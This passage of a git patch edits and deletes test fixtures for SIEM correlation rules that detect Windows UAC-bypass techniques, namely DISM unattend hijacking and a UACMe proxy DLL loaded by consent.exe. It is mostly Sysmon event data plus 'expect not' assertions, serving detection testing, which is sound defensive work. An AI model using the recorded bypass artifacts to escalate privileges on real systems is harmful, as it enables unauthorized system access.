/n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\test.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": 
"\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\test.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\test.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"} -{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", 
"object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "dism.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"} - -expect not {"correlation_name": "UACME_23_DismCore_Hijacking"} 
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_7.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_7.sc
deleted file mode 100644
index 4db762a4..00000000
--- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UACME_23_DismCore_Hijacking/tests/test_7.sc
+++ /dev/null
@@ -1,4 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.6206002Z\"},\"EventRecordID\":\"5434\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.343\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ProcessId\",\"text\":\"5756\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\Dism.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Dism Image Servicing Utility\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\dism.exe\\\" /online /norestart 
/apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B,MD5=5DA4BB31F15D76DBE31CE8C170A9930D,SHA256=34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196,IMPHASH=497B8A05ACC6B88AC41DD94255FC8AFF\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010622f0401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"216\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\PkgMgr.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\pkgmgr.exe\\\" /n:C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1627059", "object.process.cmdline": 
"\"C:\\Windows\\system32\\dism.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\dism.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.hash.imphash": "497B8A05ACC6B88AC41DD94255FC8AFF", "object.process.hash.md5": "5DA4BB31F15D76DBE31CE8C170A9930D", "object.process.hash.sha1": "0E1605A2115AE2AF4D95CF4D613E9F4C35C2832B", "object.process.hash.sha256": "34FEEB2ED81F9B52A03DD33A46A382883DA0B27CF1026F26C63DF8DB3814B196", "object.process.id": "5756", "object.process.meta": "Description:Dism Image Servicing Utility | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "dism.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\pkgmgr.exe\" /n:C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml", "object.process.parent.fullpath": "c:\\windows\\system32\\pkgmgr.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010622f0401", "object.process.parent.id": "216", "object.process.parent.name": "pkgmgr.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:03.998Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.343Z", "type": "raw", "uuid": "c4267ff3-ae1c-408c-a428-f39ee70fcae7"} -{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-08-03T12:06:55.8204069Z\"},\"EventRecordID\":\"5435\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"2780\",\"ThreadID\":\"3676\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-08-03 12:06:55.471\"},{\"Name\":\"ProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010ef400401}\"},{\"Name\":\"ProcessId\",\"text\":\"4320\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"10.0.17763.1 (WinBuild.160101.0800)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft 
Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\Windows\\\\system32\\\\\"},{\"Name\":\"User\",\"text\":\"MSEDGEWIN10\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{747f3d96-56a3-5d45-0000-0020b3d31800}\"},{\"Name\":\"LogonId\",\"text\":\"0x18d3b3\"},{\"Name\":\"TerminalSessionId\",\"text\":\"1\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{747f3d96-78df-5d45-0000-0010bd350401}\"},{\"Name\":\"ParentProcessId\",\"text\":\"5756\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\test.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"\\\"C:\\\\Windows\\\\system32\\\\test.exe\\\" /online /norestart /apply-unattend:\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Temp\\\\oemsetup.xml\\\"\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "747f3d96-56a3-5d45-0000-0020b3d31800", "event_src.category": "Other", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "msedgewin10", "object.account.id": "synthetic:ieuser@msedgewin10", "object.account.name": "ieuser", "object.account.privileges": "High", 
"object.account.session_id": "1627059", "object.process.cmdline": "\"C:\\Windows\\system32\\cmd.exe\"", "object.process.cwd": "C:\\Windows\\system32\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "747f3d96-78df-5d45-0000-0010ef400401", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "975B45B669930B0CC773EAF2B414206F", "object.process.hash.sha1": "8C5437CD76A89EC983E3B364E219944DA3DAB464", "object.process.hash.sha256": "3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2", "object.process.id": "4320", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "\"C:\\Windows\\system32\\test.exe\" /online /norestart /apply-unattend:\"C:\\Users\\IEUser\\AppData\\Local\\Temp\\oemsetup.xml\"", "object.process.parent.fullpath": "c:\\windows\\system32\\test.exe", "object.process.parent.guid": "747f3d96-78df-5d45-0000-0010bd350401", "object.process.parent.id": "5756", "object.process.parent.name": "test.exe", "object.process.parent.path": "c:\\windows\\system32\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-13T03:28:49.299Z", "status": "success", "subject": "account", "subject.account.domain": "msedgewin10", "subject.account.id": "synthetic:ieuser@msedgewin10", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1627059", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-08-03T12:06:55.471Z", "type": "raw", "uuid": "7f409354-c16a-40be-a457-830c0f8ed79e"} - -expect not {"correlation_name": "UACME_23_DismCore_Hijacking"} 
From 6063aa631d0173fbb671780d9d75de4053692bc8 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Wed, 2 Aug 2023 11:42:40 +0300 Subject: [PATCH 53/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD=D1=8B?= =?UTF-8?q?=D0=B9=20=D1=82=D0=B5=D1=81=D1=82=D1=8B,=20=D1=80=D0=B0=D1=81?= =?UTF-8?q?=D1=88=D0=B8=D1=80=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20?= =?UTF-8?q?=D0=B4=D0=B0=D0=BD=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE?= =?UTF-8?q?=D1=80=D1=8B=D0=B5=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4?= =?UTF-8?q?=D0=B0=D0=B5=D0=BC=20=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0?= =?UTF-8?q?=D0=B2=D0=B8=D0=BB=D0=B0=20(UAC=5FBypass=5FVia=5FConsent)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../UAC_Bypass_Via_Consent/tests/test_1.sc | 23 +++++++++-- .../UAC_Bypass_Via_Consent/tests/test_2.sc | 41 +++++++++---------- .../UAC_Bypass_Via_Consent/tests/test_3.sc | 6 +++ 3 files changed, 45 insertions(+), 25 deletions(-) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_3.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_1.sc index 4b6ef1d6..c5ebf57a 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_1.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_priv_esc/UAC_Bypass_Via_Consent/tests/test_1.sc 
@@ -1,5 +1,20 @@ -{ "_checkpoint": 57615712018, "_meta": { "id": "01da0c7e-03b2-01ee-8c68-005056825a53", "time": "2023-06-05T15:02:22.4660000Z", "assetIds": [ "1864e292-4880-0001-0000-000000000007" ], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true }, "action": "start", "asset_ids": [ "1864e292-4880-0001-0000-000000000007" ], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"7\",\"Version\":\"3\",\"Level\":\"4\",\"Task\":\"7\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T15:02:22.480032900Z\"},\"EventRecordID\":\"800891\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3144\",\"ThreadID\":\"984\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"wks05.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-06-05 15:02:22.466\",\"Name\":\"UtcTime\"},{\"text\":\"{20fff121-f8dd-647d-8401-000000003900}\",\"Name\":\"ProcessGuid\"},{\"text\":\"2328\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe\",\"Name\":\"Image\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\\\comctl32.dll\",\"Name\":\"ImageLoaded\"},{\"text\":\"3.1.8.1904\",\"Name\":\"FileVersion\"},{\"text\":\"UACMe proxy DLL\",\"Name\":\"Description\"},{\"text\":\"UACMe\",\"Name\":\"Product\"},{\"text\":\"Hazardous 
Environments\",\"Name\":\"Company\"},{\"text\":\"Ikazuchi.dll\",\"Name\":\"OriginalFileName\"},{\"text\":\"MD5=9E5AED3F57CEBC5154F9373B2BB9BA05,SHA256=FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80,IMPHASH=1C6B5C991BBBDC2B578EA7DEEF4AFA1B\",\"Name\":\"Hashes\"},{\"text\":\"false\",\"Name\":\"Signed\"},{\"text\":\"-\",\"Name\":\"Signature\"},{\"text\":\"Unavailable\",\"Name\":\"SignatureStatus\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"}]}}}", "category.generic": "Executable Module", "category.high": "Availability Management", "category.low": "Control", "datafield10": "Ikazuchi.dll", "datafield2": "2328", "datafield3": "c:\\windows\\system32\\", "datafield4": "consent.exe", "datafield6": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "datafield7": "20fff121-f8dd-647d-8401-000000003900", "event_src.asset": "1864e292-4880-0001-0000-000000000007", "event_src.category": "Other", "event_src.fqdn": "wks05.example.com", "event_src.host": "wks05.example.com", "event_src.hostname": "wks05", "event_src.rule": "-", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2916", "historical": false, "id": "PT_Microsoft_Windows_eventlog_Sysmon_7_Image_loaded", "importance": "low", "incorrect_time": false, "input_id": "00000000-0000-0000-0000-000000000000", "job_id": "692db8c2-9d54-11eb-a8b3-0242ac130003", "mime": "application/x-pt-eventlog", "msgid": "7", "normalized": true, "object": "module", "object.account.provider": "local", "object.name": "comctl32.dll", "object.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\", "object.process.fullpath": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\comctl32.dll", 
"object.process.hash": "IMPHASH:1C6B5C991BBBDC2B578EA7DEEF4AFA1B MD5:9E5AED3F57CEBC5154F9373B2BB9BA05 SHA256:FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.hash.imphash": "1C6B5C991BBBDC2B578EA7DEEF4AFA1B", "object.process.hash.md5": "9E5AED3F57CEBC5154F9373B2BB9BA05", "object.process.hash.sha256": "FF40C2F8E6635F4D33997EB928C72C1293C5A844185DFDD3FD444FFD8C959E80", "object.process.meta": "Description:UACMe proxy DLL | Product:UACMe | Company:Hazardous Environments", "object.process.name": "comctl32.dll", "object.process.original_name": "Ikazuchi.dll", "object.process.path": "c:\\windows\\system32\\consent.exe.local\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.4377_none_de744a4e53489aa3\\", "object.property": "signature status", "object.value": "not signed", "object.version": "3.1.8.1904", "origin_app_alias": "MP-1", "origin_app_id": "185957ea-0f40-0001-0000-000000000002", "primary_siem_app_alias": "MP-1", "primary_siem_app_id": "185957ea-0f40-0001-0000-000000000002", "recv_asset": "1864e292-4880-0001-0000-000000000007", "recv_host": "wks05", "recv_ipv4": "1.2.3.4", "remote": false, "scope_id": "00000000-0000-0000-0000-000000000005", "siem_alias": "1.2.3.4", "siem_id": "e944c6fa-4174-4bb7-afae-98b42faee6b2", "site_address": "unknown site_id=null", "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "status": "success", "subject": "process", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.process.fullpath": "c:\\windows\\system32\\consent.exe", "subject.process.guid": "20fff121-f8dd-647d-8401-000000003900", "subject.process.id": "2328", "subject.process.name": "consent.exe", "subject.process.path": "c:\\windows\\system32\\", "tag": "wineventlog", "taxonomy_version": "26.0.215-release-26.0", "tenant_id": "00000000-0000-0000-0000-000000000000", "time": "2023-06-05T15:02:22.466Z", "uuid": 
"01da0c7e-03b2-01ee-8c68-005056825a53" } -{ "_checkpoint": 57615712010, "_meta": { "id": "01da0c76-03b2-01ee-8c68-005056825a53", "time": "2023-06-05T15:01:49.2630000Z", "assetIds": [ "1864e292-4880-0001-0000-000000000007" ], "site_alias": "unknown site_id=null", "site_name": "unknown site_id=null", "site_address": "unknown site_id=null", "site_is_deleted": true }, "action": "start", "asset_ids": [ "1864e292-4880-0001-0000-000000000007" ], "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T15:01:49.265081800Z\"},\"EventRecordID\":\"800883\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3144\",\"ThreadID\":\"984\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"wks05.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-06-05 